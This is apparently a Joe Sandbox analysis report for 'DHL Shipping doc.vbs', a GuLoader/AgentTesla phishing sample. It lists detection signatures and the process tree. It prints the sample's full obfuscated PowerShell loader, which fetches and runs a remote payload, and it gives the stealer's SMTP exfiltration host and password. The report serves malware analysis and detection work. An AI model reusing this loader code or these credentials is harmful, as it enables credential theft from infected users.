Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL Shipping doc.vbs

Overview

General Information

Sample name:DHL Shipping doc.vbs
Analysis ID:1430756
MD5:e483b9251c12c243495cc209ff1fa8e1
SHA1:3b1d7bdc1563c60ea44c9dd410018879fa1e392e
SHA256:ab7caea9be94fcd8bf2b3bb9a1da2fbc4af30134a190718ffd81cdb4cc9a3641
Tags:DHLvbs
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected GuLoader
Found suspicious powershell code related to unpacking or dynamic code loading
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6556 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping doc.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6692 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavegaOvarilHeadr:GraciAfuggin redstMarinrPedefoGliffpNi,eloAn.ermG otioAlkovr Pic.f Ud,siReklas BetjmAce,oeUnivenAdvok=Sl.ve$Sca hE Afmal IbizlFlestoLigulkRoistoBloodmDraaboAn,lytRef,oi Und.vMonum2.jemo4 .all2Bagdr.Immu.se ogrprejsnlLeg mi TalktCrino(Hush.$ An,iiKlimanzw ebtHandeeObserrblow.s,trgkeConvesNor esCro siTilsvoMilianpatriaFur,dlIti,e)opsmn ');$Ellokomotiv242=$Antropomorfismen[0];Spelean (Selvstarterens 'Samov$Unsa.gGroovlCabacoeart b MeanaCensolTr.al:AlkohP Int,r FugtaBacacePervrf ForkeFa,ilc Micrt,lostuOkkups Ungk=Haga.NHjrese,ktenwWadse-pearlOAccipb KalijcommoeundercU rivt Rest Pic,pSLig,ey D,ivsS,lutt ScleeEnchimUnd.f.kreplNTel.meJewe t Lods. FremW Nav eC,iefbfortoCAgglulF.skeiSnve,e lownnDkk.ntFo,st ');Spelean (Selvstarterens ' Mado$Term.PHj rnrUdeluaPhloreEtiotfKolloe Ma kc ,etat AflaunoncosOpfin.AnthoHF dtleSkrntaRettedLdrebeEctalrLophisBes s[Palme$ S ilY,rogreKredslLavsplMaskeo rintw,yocofFor,riNa,plsStranhBr.vt] thal= Morp$ForbiU Doglv Foroe HjbelSeec.k IngloEpanom.istinGr.veeValga ');$Alfilerilla=Selvstarterens 'InwrePTakserGrilna,ilare FlipfF,lthe UnthcEvo.et BubbuSkitss fagb.ServiDFluo,oDiamawbr.oknHomo lSewedo ,orta Zinkd A toFPehu iIngemlBeva eDoksa( inde$ Be.aEPreadlHvilkl Thirosal,ikStoleoPerism UnstoSkaaltGluttis.nglvOverf2 rntt4Eta,e2Havva, Ri,e$Nys,aLSadomoTri,akUnbacaLegarlBeskiofl.shsbrynjcTilloiH.acil Ammil .raua SrittTodkkofeedsr Bejd8Fritu6Paagr)Und r ';$Alfilerilla=$forecounsel[1]+$Alfilerilla;$Lokaloscillator86=$forecounsel[0];Spelean (Selvstarterens 'Raa.t$Expolg ApoilKochlo OmelbVeg,eaSdebaljuvel:EngelIFactun Lr naStrunkParaptFinnsi KlipvPreint,elec2Arb j5Udvi.5hydro=Logog(For dTSwordeP ikesL,kshtKilde-A,ostPDispeaCatentsikkehModne Urine$Glac,LDaityoStik,kAfsmiaAircrlSkn aoOver.sCannicPaleoiMeditlForbrl LogiaIn lutDismioUndogrKom,l8Hastv6montr)Retra ');while (!$Inaktivt255) {Spelean (Selvstarterens 'Thion$Lega,g .haslhverdoel,ktbEkspoaHngenlStemn:Sm.arK.erverOccasaUrnfinSejtrs Bat.s BlodtTosteiWaterlQ atrlTatoveSheatt Hand= u,ds$JivartElastr DestuFornie,nlgs ') ;Spelean $Alfilerilla;Spelean (Selvstarterens ' NonfSKompethaglba certrSubtetAbati-AlminSMidirlKartoeP,rioeKommapAjas. do,b4Hand. ');Spelean (Selvstarterens ' ini$CronigGoyadlAfmelosidebb TremaRegnelUnfig: MiniIMartrnV,yeuaH.stekTearltBilleiUri ovNon,ptPekes2Hemip5 att5Pa.om=Strep(StatfTYatageUnexpsTextutEjend-UntenP Jaz.aPosittkontihFrema Logo,$gyngeLBl.sto ranskTho.aa Her.ltursioSonebsInfamcBoghviTaffelAng sl StreaAfbudt,fteroDervir Unor8Patt,6Nonpo)Serum ') ;Spelean (Selvstarterens 'Latif$Delefg BlomlUdvikoK.empb .enga DoublVa,tl:Al.rmBkardiaHypopr papenN ctie FurnsMa.sekUm ddeTeks,fUnobnuUnpallbedemd,ounteNonac2 Epop8Englo= ,air$ Bagtg SupelGenetoFordubFunktaBagtalH dro:.ikkeLTortenTyngdt CasaaFranagskrmaeAsym rChoro+Chrom+Likvi%Progr$gymnaA SlannP,ttotwh.ner .atao Fla pupaatoU,dermBart oModenrAa saf RaahiOvolisHeathmAfdkkeTensonTimey. SkuecRenteo DrikuCircun OmdetShawl ') ;$Ellokomotiv242=$Antropomorfismen[$Barneskefulde28];}Spelean (Selvstarterens 'Uncom$Pyromg Fat,l nildoMinerbT,ansaUdskylNorm.:Fest S Bawde HornaD,ants Gedeh BusheFuldmlMartilYoginsRet.a1Stren Bille=Polym rapG Fl seSofavtMhto -,prngCTho noBydelnFinurt,ebreeRockanevangtAntil urali$RadilL Li io AlumkKeratadataslRaaklo B resTrinncUfo,siS.perlSedgylRen gaSorgltCompro UnivrB.lli8Sciss6Pupil ');Spelean (Selvstarterens ' Over$ HiergAgg,als.pieoRe labTekstaStjerlRe ns:SalutPUfuldrOpli,oPricecNedtrl ChyliRadi nTrunkeRende Breto=Rumsk Gipsp[Ge.etSTropeyClaspsSaanit ar eeBernym tdpu.TerroC fhugoBrsspn CanovDepoleBade rdokumtAfsk,] Man.:Firet:Bee rF reesrLibraoUnri.mSandkBE.pyea SacrsLflaseLsg.g6Mesod4Fed.kSOsmortPfef.rDetoniFilehnustadgSpejl(Stald$MesosS Metae prawaCo agsHomo,hdelpheCacoclKorjalTel.ps Dros1Hazar) Bedd ');Spelean (Selvstarterens 'Unrea$Paahogforb.lPityroU,bytb ChifaSadislmod,l:ClarnC TarmoM,almr cinun tapleForm.tDomnrtDo,er1 F,go4.rrep7Syste Presf=,dsla Sko,s[SprogS NoneyJailes Kompt ZealeS,gekmAnoma.FluidTArbe.eerhvexgymnatLrred.Ne riEinternIntercTrefao Y.nddBakteiStampn Sc lgUnder].inas:Pereg:WaggoAKildeSProtoCCo,nhI PresISkovs.Tu.soG AromeSubpetchau.S Luxet U sir.hasmimlke.n AnnegUdpo,(Afpri$pakslP WhinrJowino LindcMedicl JackiBlindnUnhareFalka)Vensk ');Spelean (Selvstarterens 'T age$ fletgFase.lRa,ghoFanc,bMultiaSemigl ict:PeepsPGafleaArbact ,pdee L njlSus.elOrdreuClithlStereaUnpro=Tegle$KukulCHolmgoC,ummr Af,enForfie Lacht Umbrt ty.i1Tr.mp4Foo.g7Korst.MarkisBa,tuu Shicbestras OdontTag tr Discitripen fromgSo de( uspi3 je l0Co,ro5Bygge1Faktu6Surmi4Pepto,Bor.e2Burro9nedsl0Klved5Helbr4 Orga)Under ');Spelean $Patellula;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7096 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aptychus.Whi && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 5932 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavegaOvarilHeadr:GraciAfuggin redstMarinrPedefoGliffpNi,eloAn.ermG otioAlkovr Pic.f Ud,siReklas BetjmAce,oeUnivenAdvok=Sl.ve$Sca hE Afmal IbizlFlestoLigulkRoistoBloodmDraaboAn,lytRef,oi Und.vMonum2.jemo4 .all2Bagdr.Immu.se ogrprejsnlLeg mi TalktCrino(Hush.$ An,iiKlimanzw ebtHandeeObserrblow.s,trgkeConvesNor esCro siTilsvoMilianpatriaFur,dlIti,e)opsmn ');$Ellokomotiv242=$Antropomorfismen[0];Spelean (Selvstarterens 'Samov$Unsa.gGroovlCabacoeart b MeanaCensolTr.al:AlkohP Int,r FugtaBacacePervrf ForkeFa,ilc Micrt,lostuOkkups Ungk=Haga.NHjrese,ktenwWadse-pearlOAccipb KalijcommoeundercU rivt Rest Pic,pSLig,ey D,ivsS,lutt ScleeEnchimUnd.f.kreplNTel.meJewe t Lods. FremW Nav eC,iefbfortoCAgglulF.skeiSnve,e lownnDkk.ntFo,st ');Spelean (Selvstarterens ' Mado$Term.PHj rnrUdeluaPhloreEtiotfKolloe Ma kc ,etat AflaunoncosOpfin.AnthoHF dtleSkrntaRettedLdrebeEctalrLophisBes s[Palme$ S ilY,rogreKredslLavsplMaskeo rintw,yocofFor,riNa,plsStranhBr.vt] thal= Morp$ForbiU Doglv Foroe HjbelSeec.k IngloEpanom.istinGr.veeValga ');$Alfilerilla=Selvstarterens 'InwrePTakserGrilna,ilare FlipfF,lthe UnthcEvo.et BubbuSkitss fagb.ServiDFluo,oDiamawbr.oknHomo lSewedo ,orta Zinkd A toFPehu iIngemlBeva eDoksa( inde$ Be.aEPreadlHvilkl Thirosal,ikStoleoPerism UnstoSkaaltGluttis.nglvOverf2 rntt4Eta,e2Havva, Ri,e$Nys,aLSadomoTri,akUnbacaLegarlBeskiofl.shsbrynjcTilloiH.acil Ammil .raua SrittTodkkofeedsr Bejd8Fritu6Paagr)Und r ';$Alfilerilla=$forecounsel[1]+$Alfilerilla;$Lokaloscillator86=$forecounsel[0];Spelean (Selvstarterens 'Raa.t$Expolg ApoilKochlo OmelbVeg,eaSdebaljuvel:EngelIFactun Lr naStrunkParaptFinnsi KlipvPreint,elec2Arb j5Udvi.5hydro=Logog(For dTSwordeP ikesL,kshtKilde-A,ostPDispeaCatentsikkehModne Urine$Glac,LDaityoStik,kAfsmiaAircrlSkn aoOver.sCannicPaleoiMeditlForbrl LogiaIn lutDismioUndogrKom,l8Hastv6montr)Retra ');while (!$Inaktivt255) {Spelean (Selvstarterens 'Thion$Lega,g .haslhverdoel,ktbEkspoaHngenlStemn:Sm.arK.erverOccasaUrnfinSejtrs Bat.s BlodtTosteiWaterlQ atrlTatoveSheatt Hand= u,ds$JivartElastr DestuFornie,nlgs ') ;Spelean $Alfilerilla;Spelean (Selvstarterens ' NonfSKompethaglba certrSubtetAbati-AlminSMidirlKartoeP,rioeKommapAjas. do,b4Hand. ');Spelean (Selvstarterens ' ini$CronigGoyadlAfmelosidebb TremaRegnelUnfig: MiniIMartrnV,yeuaH.stekTearltBilleiUri ovNon,ptPekes2Hemip5 att5Pa.om=Strep(StatfTYatageUnexpsTextutEjend-UntenP Jaz.aPosittkontihFrema Logo,$gyngeLBl.sto ranskTho.aa Her.ltursioSonebsInfamcBoghviTaffelAng sl StreaAfbudt,fteroDervir Unor8Patt,6Nonpo)Serum ') ;Spelean (Selvstarterens 'Latif$Delefg BlomlUdvikoK.empb .enga DoublVa,tl:Al.rmBkardiaHypopr papenN ctie FurnsMa.sekUm ddeTeks,fUnobnuUnpallbedemd,ounteNonac2 Epop8Englo= ,air$ Bagtg SupelGenetoFordubFunktaBagtalH dro:.ikkeLTortenTyngdt CasaaFranagskrmaeAsym rChoro+Chrom+Likvi%Progr$gymnaA SlannP,ttotwh.ner .atao Fla pupaatoU,dermBart oModenrAa saf RaahiOvolisHeathmAfdkkeTensonTimey. SkuecRenteo DrikuCircun OmdetShawl ') ;$Ellokomotiv242=$Antropomorfismen[$Barneskefulde28];}Spelean (Selvstarterens 'Uncom$Pyromg Fat,l nildoMinerbT,ansaUdskylNorm.:Fest S Bawde HornaD,ants Gedeh BusheFuldmlMartilYoginsRet.a1Stren Bille=Polym rapG Fl seSofavtMhto -,prngCTho noBydelnFinurt,ebreeRockanevangtAntil urali$RadilL Li io AlumkKeratadataslRaaklo B resTrinncUfo,siS.perlSedgylRen gaSorgltCompro UnivrB.lli8Sciss6Pupil ');Spelean (Selvstarterens ' Over$ HiergAgg,als.pieoRe labTekstaStjerlRe ns:SalutPUfuldrOpli,oPricecNedtrl ChyliRadi nTrunkeRende Breto=Rumsk Gipsp[Ge.etSTropeyClaspsSaanit ar eeBernym tdpu.TerroC fhugoBrsspn CanovDepoleBade rdokumtAfsk,] Man.:Firet:Bee rF reesrLibraoUnri.mSandkBE.pyea SacrsLflaseLsg.g6Mesod4Fed.kSOsmortPfef.rDetoniFilehnustadgSpejl(Stald$MesosS Metae prawaCo agsHomo,hdelpheCacoclKorjalTel.ps Dros1Hazar) Bedd ');Spelean (Selvstarterens 'Unrea$Paahogforb.lPityroU,bytb ChifaSadislmod,l:ClarnC TarmoM,almr cinun tapleForm.tDomnrtDo,er1 F,go4.rrep7Syste Presf=,dsla Sko,s[SprogS NoneyJailes Kompt ZealeS,gekmAnoma.FluidTArbe.eerhvexgymnatLrred.Ne riEinternIntercTrefao Y.nddBakteiStampn Sc lgUnder].inas:Pereg:WaggoAKildeSProtoCCo,nhI PresISkovs.Tu.soG AromeSubpetchau.S Luxet U sir.hasmimlke.n AnnegUdpo,(Afpri$pakslP WhinrJowino LindcMedicl JackiBlindnUnhareFalka)Vensk ');Spelean (Selvstarterens 'T age$ fletgFase.lRa,ghoFanc,bMultiaSemigl ict:PeepsPGafleaArbact ,pdee L njlSus.elOrdreuClithlStereaUnpro=Tegle$KukulCHolmgoC,ummr Af,enForfie Lacht Umbrt ty.i1Tr.mp4Foo.g7Korst.MarkisBa,tuu Shicbestras OdontTag tr Discitripen fromgSo de( uspi3 je l0Co,ro5Bygge1Faktu6Surmi4Pepto,Bor.e2Burro9nedsl0Klved5Helbr4 Orga)Under ');Spelean $Patellula;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 7128 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aptychus.Whi && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 2668 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Host": "mail.cash4cars.nz", "Username": "logs@cash4cars.nz", "Password": "logs2024!"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2123886427.0000000008920000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000009.00000002.2940602617.0000000022451000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000009.00000002.2940602617.0000000022451000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000009.00000002.2940602617.000000002247B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000004.00000002.2125155356.000000000A967000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 6 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_6692.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0x10237:$b2: ::FromBase64String(
            • 0xd5b2:$s1: -join
            • 0x6d5e:$s4: +=
            • 0x6e20:$s4: +=
            • 0xb047:$s4: +=
            • 0xd164:$s4: +=
            • 0xd44e:$s4: +=
            • 0xd594:$s4: +=
            • 0xf7e2:$s4: +=
            • 0xf862:$s4: +=
            • 0xf928:$s4: +=
            • 0xf9a8:$s4: +=
            • 0xfb7e:$s4: +=
            • 0xfc02:$s4: +=
            • 0xdccb:$e4: Get-WmiObject
            • 0xdeba:$e4: Get-Process
            • 0xdf12:$e4: Start-Process
            amsi32_5932.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0x1018b:$b2: ::FromBase64String(
            • 0xd5b2:$s1: -join
            • 0x6d5e:$s4: +=
            • 0x6e20:$s4: +=
            • 0xb047:$s4: +=
            • 0xd164:$s4: +=
            • 0xd44e:$s4: +=
            • 0xd594:$s4: +=
            • 0xf7e2:$s4: +=
            • 0xf862:$s4: +=
            • 0xf928:$s4: +=
            • 0xf9a8:$s4: +=
            • 0xfb7e:$s4: +=
            • 0xfc02:$s4: +=
            • 0xdccb:$e4: Get-WmiObject
            • 0xdeba:$e4: Get-Process
            • 0xdf12:$e4: Start-Process
            • 0x17d1e:$e4: Get-Process

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping doc.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping doc.vbs", CommandLine|base64offset|contains: J), Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping doc.vbs", ProcessId: 6556, ProcessName: wscript.exe
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping doc.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping doc.vbs", CommandLine|base64offset|contains: J), Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping doc.vbs", ProcessId: 6556, ProcessName: wscript.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr 